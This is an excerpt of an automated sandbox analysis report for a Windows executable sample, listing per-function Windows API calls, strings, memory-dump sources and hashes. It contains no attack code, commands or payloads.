                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePost$CtrlFocus
                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                            • API String ID: 1534620443-4108050209
                                                                                                                                                                                                                                                            • Opcode ID: 2e422b1c08ab171f16f5d4701dd840214b3d6977956fc02ab80c70b0c84f279a
                                                                                                                                                                                                                                                            • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e422b1c08ab171f16f5d4701dd840214b3d6977956fc02ab80c70b0c84f279a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                                                                                                                                                            Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$CreateDestroy
                                                                                                                                                                                                                                                            • String ID: ,$tooltips_class32
                                                                                                                                                                                                                                                            • API String ID: 1109047481-3856767331
                                                                                                                                                                                                                                                            • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                                                                                                            • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                                                                                                                                                            Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                                                                                                                                                            • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                            • API String ID: 1441871840-4108050209
                                                                                                                                                                                                                                                            • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                                                                                                                                                                            • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                                                                                                                                                                            Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00460915
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 0046092D
                                                                                                                                                                                                                                                            • _wprintf.LIBCMT ref: 004609E1
                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                            • API String ID: 3631882475-2268648507
                                                                                                                                                                                                                                                            • Opcode ID: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
                                                                                                                                                                                                                                                            • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                                                                                                                                                            Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 00471740
                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0047184F
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4116747274-0
                                                                                                                                                                                                                                                            • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                                                                                                                                            • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                                                                                                                                                                            Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00461683
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00461721
                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 004618C3
                                                                                                                                                                                                                                                            • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                                                                                                                                                            • String ID: %s%u
                                                                                                                                                                                                                                                            • API String ID: 1899580136-679674701
                                                                                                                                                                                                                                                            • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                                                                                                                            • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                                                                                                                                                                            Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InfoItemMenu$Sleep
                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                            • API String ID: 1196289194-4108050209
                                                                                                                                                                                                                                                            • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                                                                                                                                                                            • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                                                                                                                                                                            Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                                                                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                                                                                                                                                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                            • API String ID: 3300687185-3887548279
                                                                                                                                                                                                                                                            • Opcode ID: 1916d1f944177accc8fa450b86a52df0f0c761bf2b05309f5d2a3d4fedb07dbb
                                                                                                                                                                                                                                                            • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1916d1f944177accc8fa450b86a52df0f0c761bf2b05309f5d2a3d4fedb07dbb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                                                                                                                                                            Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                                                                                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                            • API String ID: 1976180769-4113822522
                                                                                                                                                                                                                                                            • Opcode ID: 0f6c8a3de1c9442f7f3474ab6782275dee6e5c09c811d69c53e3fb1fd536eda6
                                                                                                                                                                                                                                                            • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f6c8a3de1c9442f7f3474ab6782275dee6e5c09c811d69c53e3fb1fd536eda6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                                                                                                                                                            Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
